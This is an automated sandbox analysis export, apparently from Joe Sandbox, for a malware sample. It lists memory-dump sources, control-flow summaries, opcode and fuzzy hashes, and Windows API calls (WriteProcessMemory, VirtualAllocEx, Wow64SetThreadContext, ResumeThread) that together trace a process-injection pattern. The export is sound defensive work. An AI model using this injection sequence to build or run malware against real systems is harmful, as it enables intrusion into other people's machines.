                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 6316725d44600eec481d77d66a3b31ee3fc6dffdd41c993e0bdbfa142baed7f4
                                                                        • Instruction ID: 040f4c299c14aa773b2964c1b2e5fe6570f212308229bdf8c250c0e57a959c76
                                                                        • Opcode Fuzzy Hash: 6316725d44600eec481d77d66a3b31ee3fc6dffdd41c993e0bdbfa142baed7f4
                                                                        • Instruction Fuzzy Hash: CD41D0B4D00719CBDB24DFAAC884ADEBBF5BF49704F20806AD409AB251DB756946CF90

                                                                        Control-flow Graph

                                                                        control_flow_graph 932 14c590c-14c59d9 CreateActCtxA 934 14c59db-14c59e1 932->934 935 14c59e2-14c5a3c 932->935 934->935 942 14c5a3e-14c5a41 935->942 943 14c5a4b-14c5a4f 935->943 942->943 944 14c5a60 943->944 945 14c5a51-14c5a5d 943->945 947 14c5a61 944->947 945->944 947->947
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: a2e3dfcdb4f4f4560046838fd80c0543e412644ab341098ec906f94ee55c8084
                                                                        • Instruction ID: a1a1c27b38b44b56f54538a31b4079324a9cc6dd2d4756a85bf0a504e47cfdb3
                                                                        • Opcode Fuzzy Hash: a2e3dfcdb4f4f4560046838fd80c0543e412644ab341098ec906f94ee55c8084
                                                                        • Instruction Fuzzy Hash: E34112B0D00719CBDB24CFAAC884BCEBBF1BF49304F2480AAD008AB251DB756946CF50

                                                                        Control-flow Graph

                                                                        control_flow_graph 948 7320ee0-7320f36 951 7320f46-7320f85 WriteProcessMemory 948->951 952 7320f38-7320f44 948->952 954 7320f87-7320f8d 951->954 955 7320f8e-7320fbe 951->955 952->951 954->955
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07320F78
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 88d1f1f0f5f68992c31d2394edc94ce7bc51f2bc91644ea7877a6051a24f7f7e
                                                                        • Instruction ID: 406e6dbc30387b7ef34458a69277c24c8207a9e93903d0d19e141dc2f1b2f374
                                                                        • Opcode Fuzzy Hash: 88d1f1f0f5f68992c31d2394edc94ce7bc51f2bc91644ea7877a6051a24f7f7e
                                                                        • Instruction Fuzzy Hash: DD2148B19003599FDB10CFA9C885BDEBFF5FF48320F108429E918A7241D7789945DBA1

                                                                        Control-flow Graph

                                                                        control_flow_graph 959 7320ee8-7320f36 961 7320f46-7320f85 WriteProcessMemory 959->961 962 7320f38-7320f44 959->962 964 7320f87-7320f8d 961->964 965 7320f8e-7320fbe 961->965 962->961 964->965
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07320F78
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: a7b38ae391e5a2e8fdfdb3e941ce06b372886b7cfd4ce46db5c57da6888bd3c4
                                                                        • Instruction ID: bea65dfaf9c8f044445e856328fdcc5ac26eed4a81781f5b0a2564f3bc074d6e
                                                                        • Opcode Fuzzy Hash: a7b38ae391e5a2e8fdfdb3e941ce06b372886b7cfd4ce46db5c57da6888bd3c4
                                                                        • Instruction Fuzzy Hash: D22139B19003599FDB10DFA9C881BDEBBF5FF48320F108429E918A7250D7789945DBA1

                                                                        Control-flow Graph

                                                                        control_flow_graph 980 7320fd0-7321065 ReadProcessMemory 983 7321067-732106d 980->983 984 732106e-732109e 980->984 983->984
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07321058
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 5c584fea39b54f4dfdadb200cefa1638b6ae56f509fbda4aabfc146b16c85040
                                                                        • Instruction ID: 1ccbf2e0b58e06866587947f0ede9a962b5cdb3763d5cb33ca69884943f7efd9
                                                                        • Opcode Fuzzy Hash: 5c584fea39b54f4dfdadb200cefa1638b6ae56f509fbda4aabfc146b16c85040
                                                                        • Instruction Fuzzy Hash: 45214AB19003599FDB10DFAAC841ADEFBF5FF48320F50882AE559A7240C7759941DBA1

                                                                        Control-flow Graph

                                                                        control_flow_graph 969 7320d49-7320d9b 972 7320dab-7320ddb Wow64SetThreadContext 969->972 973 7320d9d-7320da9 969->973 975 7320de4-7320e14 972->975 976 7320ddd-7320de3 972->976 973->972 976->975
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07320DCE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: c2846336d51b14698eee79040cb2ba57f68f8331fe8df1ca2e674e088577ea6a
                                                                        • Instruction ID: a189f55d6c55c209f9168040455a763cadffc5735759be3ba4e310443666eb00
                                                                        • Opcode Fuzzy Hash: c2846336d51b14698eee79040cb2ba57f68f8331fe8df1ca2e674e088577ea6a
                                                                        • Instruction Fuzzy Hash: 5E215CB19002198FDB10DFAAC4457EEBFF4EF48324F14842AD419A7241C778A945CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 988 14cd23c-14cd6e4 DuplicateHandle 990 14cd6ed-14cd70a 988->990 991 14cd6e6-14cd6ec 988->991 991->990
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014CD616,?,?,?,?,?), ref: 014CD6D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 1a803286b863a6e34a1469056173a4c3e5c17c2e8841b01393380dbd351fd1fa
                                                                        • Instruction ID: b2d575ffd52edceadf54b2d8ca13aefe39a074d8c06f4673ab61a7259a842e50
                                                                        • Opcode Fuzzy Hash: 1a803286b863a6e34a1469056173a4c3e5c17c2e8841b01393380dbd351fd1fa
                                                                        • Instruction Fuzzy Hash: A521D4B5D002489FDB10CF9AD484ADEBBF4EB48320F14842AE919A7350D374A940CFA5
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014CD616,?,?,?,?,?), ref: 014CD6D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 3e158250652741fad6c3475dd806a55bd6ed6c221a18aac2dacabc91cc7cc207
                                                                        • Instruction ID: ff2e5fe24b0ae79d612e113dede00844602eebeeef90a65a3c6471df83090c35
                                                                        • Opcode Fuzzy Hash: 3e158250652741fad6c3475dd806a55bd6ed6c221a18aac2dacabc91cc7cc207
                                                                        • Instruction Fuzzy Hash: 0621E3B5D00249DFDB10CF9AD584ADEBBF4FB48320F24841AE919A7710C378A940CF60
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07321058
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07320DCE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07320E96
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07320E96
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFBE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0732479D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0732479D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: m
                                                                        • API String ID: 0-3775001192
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: f94ffe5ae03411b0034b5d84ea288610efeb8e626e906ee3f400df218c785811
                                                                        • Instruction ID: 88843100fe498d343b76989713b2205c39cc4d554ebface8c982d715b473e1ea
                                                                        • Opcode Fuzzy Hash: f94ffe5ae03411b0034b5d84ea288610efeb8e626e906ee3f400df218c785811
                                                                        • Instruction Fuzzy Hash: 6DE0C2B090430CEBFB30DFB4D5492ADBFB8AB05205F1445AAD40E93250EF364A41EB41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7
                                                                        • API String ID: 0-1790921346
                                                                        • Opcode ID: 4cedc00c07a565cad1dd24cdc5af9a9b1760a583d16b84c849e74649e0084356
                                                                        • Instruction ID: bd635d2cc3fdb3a07b4044ab442beb1ffadc959cec07954a3136a027b499e3be
                                                                        • Opcode Fuzzy Hash: 4cedc00c07a565cad1dd24cdc5af9a9b1760a583d16b84c849e74649e0084356
                                                                        • Instruction Fuzzy Hash: F9E0C2F084524CEBEB20EFB4E4057ADBBB8A701205F400599C40E53640D7382A45D643
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5f14b9722a9c892f020f19f682ad8523d87dc1472fd49684992e07848c6b0c7
                                                                        • Instruction ID: 226272735e448d7c0499c5fe6037a7c7e49bb51a3a1cf754e910109b66bcf8c2
                                                                        • Opcode Fuzzy Hash: b5f14b9722a9c892f020f19f682ad8523d87dc1472fd49684992e07848c6b0c7
                                                                        • Instruction Fuzzy Hash: 03A12CF0E2521ACBDB10DFA9C880AEDFBBAFF89300F109615E409AB615DB346D45CB41
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e51d3c7e3b99e99a7a1b4c7f83faa731999de88d5425690a1b75e6f60d13e237
                                                                        • Instruction ID: 11bf85f8828af6f9a417f6bb257b05d67ca43dde70204bce0240df057d181649
                                                                        • Opcode Fuzzy Hash: e51d3c7e3b99e99a7a1b4c7f83faa731999de88d5425690a1b75e6f60d13e237
                                                                        • Instruction Fuzzy Hash: 4C914BF0E2521ACBDB14DFA9C880AEDBBBAFF89300F109615E409AB755DB345D45CB81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c9a3584fd35616a948308d5c98454aa235a63c2b86f4e7c4dfecd3fcb145b8e
                                                                        • Instruction ID: 13469df042127afa3a7c7bcbc5f1e9b867924aa01d6a667f7330a8ecb9f49f2f
                                                                        • Opcode Fuzzy Hash: 8c9a3584fd35616a948308d5c98454aa235a63c2b86f4e7c4dfecd3fcb145b8e
                                                                        • Instruction Fuzzy Hash: 498193B5E14619CFDF11CFA8C891AAEBBB5AF49304F108469D819EB301D7359946CF50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e23541ecf1aef08d8d61bf7d2e5cf9377b2e7a6a0fd3853b143aa28b8f9d778
                                                                        • Instruction ID: 7248f8a057f9aab121fe4a7b03f07ef2b88ed9d739a3418bfd4561aaafaaa3f3
                                                                        • Opcode Fuzzy Hash: 3e23541ecf1aef08d8d61bf7d2e5cf9377b2e7a6a0fd3853b143aa28b8f9d778
                                                                        • Instruction Fuzzy Hash: 994106B4E001099FDB54DFA9C484AEEBBF6FB89310F14C469D919E7340DB359902CB51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f63f93ff46956c66cc56dd83d245947fd9733583b513bdc59f99f0f745b52af
                                                                        • Instruction ID: 92e1e50117e16fc408165b7e663c4e8f8e67cf303735418fa20c2c93c8284456
                                                                        • Opcode Fuzzy Hash: 5f63f93ff46956c66cc56dd83d245947fd9733583b513bdc59f99f0f745b52af
                                                                        • Instruction Fuzzy Hash: 404138B4E002099FDB54DFA8C884AEEBBF2EB49210F14C56AD919EB350DB359942CB51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2c1ee55dfed3cf31a1f537c20c6f4366479ba5ffe4020eed8c67d618fcd22f9
                                                                        • Instruction ID: c0837e45eabb625a68d894ec42d0b54d1ae715178d2dbb45aaea659e9ffef82e
                                                                        • Opcode Fuzzy Hash: f2c1ee55dfed3cf31a1f537c20c6f4366479ba5ffe4020eed8c67d618fcd22f9
                                                                        • Instruction Fuzzy Hash: 1C41F3B8E1120A8FEB14DFB9D8595AEBFF1BF49201F14952AE806E3250EB34D901CF54
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3e0d89c1c2e77c6278be684ecaf458f199807bcdbc8d47a26137ef08111c0fb
                                                                        • Instruction ID: a30a1bf25350cdc31fb38c804db2ce9d92d28edd01de509bf3e30800b2bad5d4
                                                                        • Opcode Fuzzy Hash: c3e0d89c1c2e77c6278be684ecaf458f199807bcdbc8d47a26137ef08111c0fb
                                                                        • Instruction Fuzzy Hash: 6E317CB5900249AFDB10DFA9D844A9EBFF9EF48320F10846AE808E7210D7359954CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849450306.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_12dd000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80589769c7767bf634c32ce6f16c1c63b91136a17a01a4ccf468a0a9e23216c6
                                                                        • Instruction ID: bb7aadea8a9d7158aaac3db166dbdd9a83c20da1a8cf9fa3c63ef16555a69e3e
                                                                        • Opcode Fuzzy Hash: 80589769c7767bf634c32ce6f16c1c63b91136a17a01a4ccf468a0a9e23216c6
                                                                        • Instruction Fuzzy Hash: AC2167B1514648DFDB11DF98E8C0F26BF65FB88318F24C56DE9090B286C336D406CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849450306.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_12dd000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b31226779ee27cbaf7c334466e9d0e71fdbeaf0f0bd8523772b797b4f67cce39
                                                                        • Instruction ID: eaf2777242d679ea87a0f60a481e811d711f52a738f331c700faee0fcea81554
                                                                        • Opcode Fuzzy Hash: b31226779ee27cbaf7c334466e9d0e71fdbeaf0f0bd8523772b797b4f67cce39
                                                                        • Instruction Fuzzy Hash: B72145B5514648DFDB01DF98C9C0B66BFA5FB88324F24C56CEA090B286C336E406CAA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8fed458f40f9e5b2afc13af030f8e38af4f09d241999b4fc0c634ce48a93d10a
                                                                        • Instruction ID: d9c0167274723ae5875488d9f7fdfa08c4eada95476ad636538aa3c0a83db7dd
                                                                        • Opcode Fuzzy Hash: 8fed458f40f9e5b2afc13af030f8e38af4f09d241999b4fc0c634ce48a93d10a
                                                                        • Instruction Fuzzy Hash: BD3172B4E1124EDFDB50DFA9D5856EEBBF4AB08210F14946AE818F3740E734AA40CF61
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849516232.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_12ed000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: beda64ae04b200e12ce271ba65b405f3ccd0f2b94e86188199f5929e3bfd3a13
                                                                        • Instruction ID: 705ad4e16760e674073c6b9e728ce1d1418286ca9e4f52ba6a6df486605d1f3c
                                                                        • Opcode Fuzzy Hash: beda64ae04b200e12ce271ba65b405f3ccd0f2b94e86188199f5929e3bfd3a13
